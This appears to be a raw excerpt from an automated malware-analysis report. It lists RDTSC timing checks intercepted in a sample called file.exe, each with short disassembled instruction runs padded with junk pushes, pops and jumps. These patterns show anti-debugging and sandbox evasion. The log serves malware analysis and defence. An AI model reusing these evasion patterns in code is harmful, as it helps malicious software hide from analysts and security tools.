              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E882F second address: 9E8833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8833 second address: 9E884E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5A4D20AA01h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E884E second address: 9E8858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5A4CBCDC66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8858 second address: 9E885C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF708 second address: 9EF73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4CBCDC6Bh 0x00000009 popad 0x0000000a pushad 0x0000000b jnl 00007F5A4CBCDC66h 0x00000011 jne 00007F5A4CBCDC66h 0x00000017 jmp 00007F5A4CBCDC77h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7280 second address: 9E728A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E728A second address: 9E72A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4CBCDC73h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD924 second address: 9FD95D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5A4D20AA07h 0x00000010 jmp 00007F5A4D20A9FFh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1380D second address: A13831 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC72h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F5A4CBCDC6Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13AFD second address: A13B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5A4D20A9FCh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13B12 second address: A13B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A140F4 second address: A14118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20AA03h 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A14118 second address: A1411E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1411E second address: A14157 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5A4D20A9F6h 0x00000008 ja 00007F5A4D20A9F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F5A4D20A9FAh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5A4D20AA02h 0x0000001d jmp 00007F5A4D20A9FAh 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A14157 second address: A14163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F5A4CBCDC66h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18B6B second address: A18B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18B6F second address: A18B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18B75 second address: A18B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A4D20AA03h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18B8C second address: A18BD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edx, ecx 0x0000000d mov edx, dword ptr [ebp+12487081h] 0x00000013 push 00000004h 0x00000015 jnl 00007F5A4CBCDC6Ch 0x0000001b call 00007F5A4CBCDC69h 0x00000020 pushad 0x00000021 jmp 00007F5A4CBCDC6Eh 0x00000026 pushad 0x00000027 jmp 00007F5A4CBCDC71h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18BD9 second address: A18BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007F5A4D20A9F8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18BED second address: A18BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18BF1 second address: A18C54 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5A4D20A9F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F5A4D20AA09h 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 jmp 00007F5A4D20AA06h 0x0000001c pushad 0x0000001d jmp 00007F5A4D20A9FFh 0x00000022 jno 00007F5A4D20A9F6h 0x00000028 popad 0x00000029 popad 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18C54 second address: A18C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18C58 second address: A18C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18C5E second address: A18C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18E1C second address: A18E20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18E20 second address: A18E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18E26 second address: A18E50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5A4D20AA05h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jns 00007F5A4D20A9F8h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1BD00 second address: A1BD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9380DA second address: 9380F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F103D9 second address: 4F103DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F103DD second address: 4F103E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F103E3 second address: 4F10402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movzx esi, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F5A4CBCDC6Bh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10402 second address: 4F1041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1041D second address: 4F10423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10423 second address: 4F10427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10427 second address: 4F1042B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F309C7 second address: 4F309CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F309CB second address: 4F309D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F309D1 second address: 4F30A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5A4D20AA02h 0x00000009 xor ah, 00000008h 0x0000000c jmp 00007F5A4D20A9FBh 0x00000011 popfd 0x00000012 mov dl, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bx, ax 0x0000001f mov ebx, esi 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30A06 second address: 4F30A3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5A4CBCDC78h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30A3C second address: 4F30A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30A40 second address: 4F30A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30A46 second address: 4F30A63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 push ecx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5A4D20AA00h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30A63 second address: 4F30A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30A69 second address: 4F30A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30A6D second address: 4F30AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ch, 80h 0x0000000e pushfd 0x0000000f jmp 00007F5A4CBCDC77h 0x00000014 sub esi, 35614ACEh 0x0000001a jmp 00007F5A4CBCDC79h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30BD8 second address: 4F30BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30BDE second address: 4F30BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30BE4 second address: 4F30BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30C4F second address: 4F30C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30C54 second address: 4F30C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30C5A second address: 4F30C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30C5E second address: 4F30CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d pushad 0x0000000e call 00007F5A4D20A9FEh 0x00000013 pushfd 0x00000014 jmp 00007F5A4D20AA02h 0x00000019 xor eax, 35645AF8h 0x0000001f jmp 00007F5A4D20A9FBh 0x00000024 popfd 0x00000025 pop ecx 0x00000026 mov ch, dh 0x00000028 popad 0x00000029 je 00007F5A4D20AA28h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F5A4D20AA07h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30CD3 second address: 4F30CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30293 second address: 4F3029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 34BC488Eh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3029D second address: 4F302A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F302A4 second address: 4F302C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 jmp 00007F5A4D20AA08h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F302C9 second address: 4F30326 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5A4CBCDC6Eh 0x00000008 sub ch, 00000038h 0x0000000b jmp 00007F5A4CBCDC6Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F5A4CBCDC79h 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F5A4CBCDC6Ch 0x00000022 sub ah, FFFFFFC8h 0x00000025 jmp 00007F5A4CBCDC6Bh 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30449 second address: 4F30466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5A4D20AA07h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30466 second address: 4F304BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 mov al, BCh 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F5A4CBCDC79h 0x00000019 sub cx, 9546h 0x0000001e jmp 00007F5A4CBCDC71h 0x00000023 popfd 0x00000024 popad 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5A4CBCDC6Dh 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F304BB second address: 4F30555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr fs:[00000000h] 0x0000000c jmp 00007F5A4D20A9FFh 0x00000011 nop 0x00000012 jmp 00007F5A4D20AA06h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov bx, FB24h 0x0000001d movsx edi, si 0x00000020 popad 0x00000021 nop 0x00000022 jmp 00007F5A4D20AA04h 0x00000027 sub esp, 18h 0x0000002a jmp 00007F5A4D20AA00h 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 mov dx, ax 0x00000034 pushfd 0x00000035 jmp 00007F5A4D20A9FAh 0x0000003a jmp 00007F5A4D20AA05h 0x0000003f popfd 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F5A4D20A9FCh 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30555 second address: 4F30567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A4CBCDC6Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30567 second address: 4F3059C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F5A4D20AA07h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5A4D20AA00h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3059C second address: 4F305AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F305AB second address: 4F305F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov bl, 3Ch 0x0000000d pushad 0x0000000e mov ebx, esi 0x00000010 mov ebx, ecx 0x00000012 popad 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F5A4D20AA09h 0x0000001d push esi 0x0000001e pop edi 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F305F3 second address: 4F3068F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5A4CBCDC73h 0x00000008 mov cx, 45AFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, edi 0x00000010 jmp 00007F5A4CBCDC72h 0x00000015 push eax 0x00000016 pushad 0x00000017 jmp 00007F5A4CBCDC71h 0x0000001c popad 0x0000001d xchg eax, edi 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F5A4CBCDC73h 0x00000025 add esi, 61FDB44Eh 0x0000002b jmp 00007F5A4CBCDC79h 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 pushfd 0x00000034 jmp 00007F5A4CBCDC6Eh 0x00000039 or cx, D0C8h 0x0000003e jmp 00007F5A4CBCDC6Bh 0x00000043 popfd 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3068F second address: 4F306A4 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [769B4538h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop esi 0x00000012 push ebx 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F306A4 second address: 4F306D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c pushad 0x0000000d jmp 00007F5A4CBCDC6Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F306D2 second address: 4F306D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F306D6 second address: 4F306EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5A4CBCDC6Bh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F306EE second address: 4F306F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F306F2 second address: 4F306F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F306F8 second address: 4F3073B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5A4D20AA02h 0x00000009 jmp 00007F5A4D20AA05h 0x0000000e popfd 0x0000000f mov ch, FCh 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5A4D20A9FFh 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3073B second address: 4F30741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30741 second address: 4F30745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30745 second address: 4F30762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop esi 0x00000013 mov ax, di 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30762 second address: 4F307AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d mov cx, A64Dh 0x00000011 movzx eax, bx 0x00000014 popad 0x00000015 mov dword ptr fs:[00000000h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5A4D20AA07h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F307AB second address: 4F307B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F307B1 second address: 4F307B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F307B7 second address: 4F307BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F307BB second address: 4F30819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-18h], esp 0x0000000e pushad 0x0000000f mov eax, 75CFE80Dh 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 mov eax, dword ptr fs:[00000018h] 0x0000001e jmp 00007F5A4D20AA05h 0x00000023 mov ecx, dword ptr [eax+00000FDCh] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F5A4D20AA08h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30819 second address: 4F3081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3081D second address: 4F30823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
